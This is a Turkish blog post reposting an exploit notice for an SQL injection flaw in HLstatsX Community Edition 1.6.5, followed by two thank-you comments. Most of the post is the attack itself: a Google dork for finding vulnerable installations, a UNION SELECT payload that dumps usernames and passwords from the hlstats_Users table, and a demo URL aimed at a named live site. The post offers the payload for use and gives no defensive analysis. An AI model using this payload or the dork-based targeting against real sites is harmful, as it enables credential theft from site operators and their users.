HLstatsX Community Edition 1.6.5 SQL Injection Vulnerability

18 May

HLstatsX Community Edition 1.6.5 SQL Injection Vulnerability

Posted 18 Mayıs 2010 by Admin in Genel. 2 Yorum

#############################################################
# HLstatsX Community Edition 1.6.5 SQL Injection Vulnerability

# Plugin Home: http://www.hlxcommunity.com/

# Author: BAYBORA

# Site: www.1923turk.com

##############################################################

Google Dork: “hlstats.php?mode=”

# Exploit: xxxxx.com/xxx/hlstats.php?mode=dailyawardinfo&award==[SQL-inj]

# -99+union+select+1,2,concat(username,0x3a,password)

,4+from+hlstats_Users–&game=css

# Demo: http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat(username,0x3a,password)

,4+from+hlstats_Users–&game=css

~~~~Yerinde sayanlar,Yürüyenlerden cok gürültü yaparlar!~~~~

##############################################################
# Greetz: Manas58 – Gamoscu – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
##############################################################

Like this:

Be the first to like this post.

2 responses to this post.

Posted by vir0e5 on 08 Haziran 2010 at 15:35

Nice bro,,,,, thanks !! ^^

Cevapla
Posted by wolf-system on 23 Eylül 2010 at 15:35

thanks ; )

Cevapla

Yorum yapın Cancel reply

Enter your comment here...

Fill in your details below or click an icon to log in:

Eposta (gerekli) (Address never made public)

İsim (gerekli)

İnternet sitesi

You are commenting using your WordPress.com account. ( Log Out / Değiştir )

You are commenting using your Twitter account. ( Log Out / Değiştir )

You are commenting using your Facebook account. ( Log Out / Değiştir )

Vazgeç

Connecting to %s

Baybora BURADA!! İnsanları Tanımak,İnsanları Anlamak Zor Değil ki…